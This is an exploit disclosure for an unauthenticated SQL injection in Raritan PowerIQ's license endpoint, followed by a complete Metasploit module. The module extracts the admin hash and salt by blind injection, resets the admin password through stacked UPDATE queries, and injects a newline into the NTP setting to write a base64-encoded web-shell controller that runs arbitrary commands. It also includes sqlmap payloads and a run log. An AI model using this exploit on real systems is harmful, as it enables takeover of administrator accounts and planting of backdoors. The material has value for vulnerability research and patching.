=begin
Raritan PowerIQ suffers from an unauthenticated SQL injection vulnerability
within an endpoint used during initial configuration of the licensing for
the product. This endpoint is still available after the appliance has been
fully configured.

POST /license/records HTTP/1.1

Host: 192.168.1.11

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)
Gecko/20100101 Firefox/26.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: https://192.168.1.11/license

Content-Length: 15

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache


sort=id&dir=ASC



Both the 'sort' and 'dir' parameters are vulnerable.

sqlmap identified the following injection points with a total of 1173
HTTP(s) requests:
---
Place: POST
Parameter: sort
    Type: boolean-based blind
    Title: Generic boolean-based blind - GROUP BY and ORDER BY clauses
    Payload: sort=id,(SELECT (CASE WHEN (6357=6357) THEN 1 ELSE 1/(SELECT
0) END))&dir=ASC

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries
    Payload: sort=id; SELECT PG_SLEEP(5)--&dir=ASC

    Type: AND/OR time-based blind
    Title: PostgreSQL > 8.1 time-based blind - Parameter replace
    Payload: sort=(SELECT 5480 FROM PG_SLEEP(5))&dir=ASC

Place: POST
Parameter: dir
    Type: boolean-based blind
    Title: Generic boolean-based blind - GROUP BY and ORDER BY clauses
    Payload: sort=id&dir=ASC,(SELECT (CASE WHEN (5274=5274) THEN 1 ELSE
1/(SELECT 0) END))

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries
    Payload: sort=id&dir=ASC; SELECT PG_SLEEP(5)--

    Type: AND/OR time-based blind
    Title: PostgreSQL > 8.1 time-based blind - GROUP BY and ORDER BY clauses
    Payload: sort=id&dir=ASC,(SELECT (CASE WHEN (1501=1501) THEN (SELECT
1501 FROM PG_SLEEP(5)) ELSE 1/(SELECT 0) END))
---


There may also be a remote command execution vulnerability available to
administrators (or you if you use the stacked injection to update the
hashes).

When saving an NTP server, you can inject a newline (%0a) into the request
in order to save a malformed 'server' stanza in the ntp.conf. When syncing
with NTP, the application passes the first NTP server to the NTP utility
via bash. I was not able to make my malformed NTP server available as the
first in the list, thus was not able to achieve RCE. There may be a way to
do it though that I am unaware of.

Attached is a Metasploit module that I began writing when attempting to
achieve RCE but was never able to. This module will

A) Pull out the current password hash and salt for the 'admin' user and
cache them.
B) Update the admin creeds to be 'admin:Passw0rd!'
C) Set up the malformed NTP server
D) Attempt to sync with NTP.

Because I was not able to achieve RCE via that vector, this module does not
actually pop a shell, so I am sorry about that. 

Maybe some PostgreSQL UDF fanciness will be the key.

You may also find the module available here:
https://gist.github.com/brandonprry/01bcd9ec7b8a78ccfc42

Quick module run:

bperry@w00den-pickle:~/tools/msf_dev$ ./msfconsole
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v4.9.0-dev [core:4.9 api:1.0] ]
+ -- --=[ 1292 exploits - 702 auxiliary - 202 post ]
+ -- --=[ 332 payloads - 33 encoders - 8 nops      ]

msf > use exploit/linux/http/raritan_poweriq_sqli
msf exploit(raritan_poweriq_sqli) > set RHOST 192.168.1.25
RHOST => 192.168.1.25
msf exploit(raritan_poweriq_sqli) > check

[*] Attempting to get banner... This could take several minutes to
fingerprint depending on network speed.
[*] Looks like the length of the banner is: 107
[+] Looks like you are vulnerable.
[+] 192.168.1.25:443 - The target is vulnerable.
msf exploit(raritan_poweriq_sqli) > exploit

[*] Started reverse handler on 192.168.1.31:4444
[*] Checking if vulnerable before attempting exploit.
[*] Attempting to get banner... This could take several minutes to
fingerprint depending on network speed.
[*] Looks like the length of the banner is: 107
[+] Looks like you are vulnerable.
[*] We are vulnerable. Exploiting.
[*] Caching current admin user's password hash and salt.
[*] I can set it back later and they will be none the wiser
[*] Grabbing current hash
[*] Old hash: 84c420e40496930e27301b10930e5966638e0b21
[*] Grabbing current salt
[*] Old salt: 8f3cceddf302b3e2465d6e856e8818c6217d4d04
[*] Resetting admin user credentials to admin:Passw0rd!
[*] Authenticating with admin:Passw0rd!
[*] Setting some stuff up
[*] Sending stager
[*] Triggering stager
[*] Exploit completed, but no session was created.
msf exploit(raritan_poweriq_sqli) >


-- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website
=end

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Raritan PowerIQ Unauthenticated SQL Injection",
      'Description'    => %q{
      This module will exploit an unauthenticated SQL injection in order to gain
      a shell on the remote victim. This was tested against PowerIQ v4.1.0.

      The 'check' command will attempt to pull the banner of the DBMS (PGSQL) in
      order to verify exploitability via boolean injections.

      In order to gain remote command execution, multiple vulnerabilities are used.

      I use a SQL injection to gain administrative access.

      I use a newline injection to save an NTP server I shouldn't be able to save.

      By saving this unsanitized NTP server, I can execute commands as 'nginx' with
      a request to the server's web application.

      You can find a trial ISO at the following link. CentOS-based with PGSQL.
      This is what this module was tested against.

      http://cdn.raritan.com/download/power-iq/v4.1.0/power-iq-v4.1.0.73.iso

      Trial license:
      http://d3b2us605ptvk2.cloudfront.net/download/power-iq/RAR_PWIQ5FL_W7rYAAT_13JAN10_1206.lic

      If for some reason these links do not work, I "registered" for the trial here:
      https://www1.raritan.com/poweriqdownload.html
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
        ],
      'References'     =>
        [
        ],
      'DefaultOptions'  =>
        {
          'SSL'      => true,
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'BadChars'    => "\x20",
          'Compat'      =>
            {
              'RequiredCmd' => 'generic perl python',
            }
        },
      'Targets'        =>
        [
          ['Raritan PowerIQ v4.1.0', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "",
      'DefaultTarget'  => 0))

      register_options(
        [
          Opt::RPORT(443),
          OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
        ], self.class)
  end

  #In order to check for exploitability, I will enumerate the banner
  #of the DBMS until I have it match a regular expression of /postgresql/i
  #
  #This isn't optimal (takes a few minutes), but it is reliable. I use
  #a boolean injection to enumerate the banner a byte at a time.
  def check

    #First we make a request that we know should return a 200
  	res = send_request_cgi({
	  	'uri' => normalize_uri(target_uri.path, 'license', 'records'),
	  	'method' => 'POST',
	  	'headers' => {
	  		'X-Requested-With' => 'XMLHttpRequest'
	  	},
	  	'data' => 'sort=id&dir=ASC'
	  })

	  if !res or res.code != 200
		  return Exploit::CheckCode::Safe
	  end

    #Now we make a request that we know should return a 500
	  res = send_request_cgi({
		  'uri' => normalize_uri(target_uri.path, 'license', 'records'),
		  'method' => 'POST',
		  'headers' => {
	  		'X-Requested-With' => 'XMLHttpRequest'
	  	},
	  	'data' => "sort=id'&dir=ASC"
	  })

	  if !res or res.code != 500
      print_error("Probably not vulnerable.")
		  return Exploit::CheckCode::Safe
	  end

    #If we have made it this far, we believe we are exploitable,
    #but now we must prove it. Get the length of the banner before
    #attempting to enumerate the banner. I assume the length
    #is not greater than 999 characters.
	  print_status("Attempting to get banner... This could take several minutes to fingerprint depending on network speed.")

	  length = ''
	  (1..3).each do |l|
		  (47..57).each do |i|
			  str = "sort=id,(SELECT (CASE WHEN (ASCII(SUBSTRING((COALESCE(CAST(LENGTH(VERSION()) AS CHARACTER(10000)),(CHR(32))))::text FROM #{l} FOR 1))>#{i}) THEN 1 ELSE 1/(SELECT 0) END))&dir=ASC"

			  res = send_request_cgi({
				  'uri' => normalize_uri(target_uri.path, 'license', 'records'),
				  'method' => 'POST',
          'headers' => {
            'X-Requested-With' => 'XMLHttpRequest'
          },
				  'data' => str
			  })

			  if res and res.code == 500
				  length << i.chr
				  break
			  end
		  end
	  end

    if length == ''
      return Exploit::CheckCode::Safe
    end

	  print_status("Looks like the length of the banner is: " + length)

    #We have the length, now let's get the banner until it matches
    #the regular expression /postgresql/i
	  banner = ''
	  (1..length.to_i).each do |c|
		  (32..126).each do |b|
			  str = "sort=id,(SELECT (CASE WHEN (ASCII(SUBSTRING((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32))))::text FROM #{c} FOR 1))>#{b}) THEN 1 ELSE 1/(SELECT 0) END))&dir=ASC"

			  res = send_request_cgi({
				  'uri' => normalize_uri(target_uri.path, 'license', 'records'),
				  'method' => 'POST',
				  'headers' => {
					  'X-Requested-With' => 'XMLHttpRequest',
				  },
				  'data' => str
			  })

			  if res and res.code == 500
				  banner << b.chr

          if c%10 == 0
            vprint_status("#{((c.to_f/length.to_f)*100).to_s}% done: " + banner)
          end

				  if banner =~ /postgresql/i
					  print_good("Looks like you are vulnerable.")
					  vprint_good("Current banner: " + banner)
					  return Exploit::CheckCode::Vulnerable
				  end

				  break
			  end
		  end
	  end

    #If we reach here, we never matched our regex, which means we must
    #not be vulnerable.
	  return Exploit::CheckCode::Safe
  end

  def exploit

    print_status("Checking if vulnerable before attempting exploit.")

    if check == Exploit::CheckCode::Vulnerable
      print_status("We are vulnerable. Exploiting.")
      print_status("Caching current admin user's password hash and salt.")
      print_status("I can set it back later and they will be none the wiser")

      print_status("Grabbing current hash")
      old_crypted_password = get_admin_column_value("crypted_password")
      print_status("Old hash: " + old_crypted_password)

      print_status("Grabbing current salt")
      old_salt = get_admin_column_value("salt")
      print_status("Old salt: " + old_salt)

      print_status("Resetting admin user credentials to admin:Passw0rd!")

      headers = {
        'X-Requested-With' => 'XMLHttpRequest'
      }

      salt_inj = ';UPDATE users set salt = (CHR(56)||CHR(102)||CHR(51)||CHR(99)||CHR(99)||CHR(101)||CHR(100)||CHR(100)||CHR(102)||CHR(51)||CHR(48)||CHR(50)||CHR(98)||CHR(51)||CHR(101)||CHR(50)||CHR(52)||CHR(54)||CHR(53)||CHR(100)||CHR(54)||CHR(101)||CHR(56)||CHR(53)||CHR(54)||CHR(101)||CHR(56)||CHR(56)||CHR(49)||CHR(56)||CHR(99)||CHR(54)||CHR(50)||CHR(49)||CHR(55)||CHR(100)||CHR(52)||CHR(100)||CHR(48)||CHR(52)) WHERE login = (CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))--'
      hash_inj = ';UPDATE users set crypted_password=(CHR(56)||CHR(52)||CHR(99)||CHR(52)||CHR(50)||CHR(48)||CHR(101)||CHR(52)||CHR(48)||CHR(52)||CHR(57)||CHR(54)||CHR(57)||CHR(51)||CHR(48)||CHR(101)||CHR(50)||CHR(55)||CHR(51)||CHR(48)||CHR(49)||CHR(98)||CHR(49)||CHR(48)||CHR(57)||CHR(51)||CHR(48)||CHR(101)||CHR(53)||CHR(57)||CHR(54)||CHR(54)||CHR(54)||CHR(51)||CHR(56)||CHR(101)||CHR(48)||CHR(98)||CHR(50)||CHR(49)) WHERE login = (CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))--'

      post = {
        'sort' => 'id' + salt_inj,
        'dir' => 'ASC'
      }

      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'license', 'records'),
        'method' => 'POST',
        'headers' => headers,
        'vars_post' => post
      })

      if !res or res.code != 200
        fail_with("Server did not respond in an expected way")
      end

      post['sort'] = 'id' + hash_inj
      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'license', 'records'),
        'method' => 'POST',
        'headers' => headers,
        'vars_post' => post
      })

      if !res or res.code != 200
        fail_with("Server did not respond in an expected way")
      end

      print_status("Authenticating with admin:Passw0rd!")
      post = {
        'login' => 'admin',
        'password' => 'Passw0rd!'
      }

      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'login', 'login'),
        'method' => 'POST',
        'vars_post' => post
      })

      if !res or res.code != 302
        fail_with("Authentication failed.")
      end

      cookie = res.get_cookies

      print_status("Setting some stuff up")
      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers.json'),
        'headers' => headers,
        'cookie' => cookie
      })

      if !res or res.code != 200
        fail_with("Server did not respond in an expected way.")
      end

      servers = JSON.parse(res.body)

      post = {
        '_method' => '_delete',
        'hosts' => servers["servers"].to_json
      }

      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers', 'destroy_batch'),
        'method' => 'DELETE',
        'vars_post' => post,
        'headers' => headers,
        'cookie' => cookie
      })

      if !res or res.code != 200
        fail_with("Server did not respond in an expected way.")
      end

      print_status("Sending stager")

      stage = '`echo${IFS}Ye2xhc3MgRmRzYUNvbnRyb2xsZXIgPCBBY3Rpb25Db250cm9sbGVyOjpCYXNlCiAgZGVmIGluZGV4'
      stage << 'CiAgICByZXQgPSBgI3twYXJhbXNbOmNtZF19YAogICAgcmVkaXJlY3RfdG8gcmV0CiAgZW5kCmVu'
      stage << 'ZCAKIAoK|base64${IFS}--decode>/opt/raritan/polaris/rails/main/app/controllers/rewq_controller.rb`'

      post = {
        'host[server]' => "www.abc.com\x0aserver " + stage,
        'host[ip_type]' => '0'
      }

      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers'),
        'method' => 'POST',
        'vars_post' => post,
        'headers' => headers,
        'cookie' => cookie
      })

      if !res or res.code != 200 or res.body =~ /false/
        fail_with("Server did not respond in an expected way.")
      end

      post = {
        '_method' => '_delete',
        'hosts' => '[{"server":"www.abc.com", "ip_type":0}]'
      }

      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers', 'destroy_batch'),
        'method' => 'DELETE',
        'vars_post' => post,
        'headers' => headers,
        'cookie' => cookie
      })

      if !res or res.code != 200
        fail_with("Server did not respond in an expected way.")
      end

      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'admin', 'application_settings', 'edit'),
        'cookie' => cookie
      })

      if !res or res.code != 200
        fail_with("Server did not respond in an expected way.")
      end

      res.body =~ /boxLabel: "Enable NTP",\n    checked: (true|false),\n    listeners/m

      checked = $1

      if checked == "true"
        post = {
          '_method' => 'put',
          'rails_options[time_zone]' => 'UTC',
          'date_time' => '',
          'rails_options[ntp_enabled]' => 'off'
        }

        res = send_request_cgi({
          'uri' => normalize_uri(target_uri.path, 'admin', 'time_setting'),
          'vars_post' => post,
          'method' => 'POST',
          'cookie' => cookie
        })

        if !res or res.code != 302
          fail_with("Server did not respond in an expected way")
        end
      end

      post = {
        '_method' => 'put',
        'rails_options[time_zone]' => 'UTC',
        'date_time' => '',
        'rails_options[ntp_enabled]' => 'on'
      }

      print_status("Triggering stager")

      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'admin', 'time_setting'),
        'method' => 'POST',
        'vars_post' => post,
        'cookie' => cookie,
      })

    end
  end

  def get_admin_column_value(column)
    ret = ''

    (1..40).each do |i|
      [*('0'..'9'),*('a'..'f')].each do |c|
        inj = "(SELECT (CASE WHEN (ASCII(SUBSTRING((SELECT COALESCE(CAST(#{column} AS CHARACTER(10000)),(CHR(32))) FROM users WHERE login = (CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110)) OFFSET 0 LIMIT 1)::text FROM #{i} FOR 1))>#{c.ord}) THEN 1 ELSE 1/(SELECT 0) END))"

        post = {
          'sort' => 'id,' + inj,
          'dir' => 'ASC'
        }

        res = send_request_cgi({
          'uri' => normalize_uri(target_uri.path, 'license', 'records'),
          'method' => 'POST',
          'headers' => {
            'X-Requested-With' => 'XMLHttpRequest'
          },
          'vars_post' => post
        })

        if !res
          fail_with("Server did not respond in an expected way")
        end

        if res.code == 500
          vprint_status("Got character '"+c+"' for index " + i.to_s)
          ret << c
          break
        end
      end
    end

    return ret
  end
end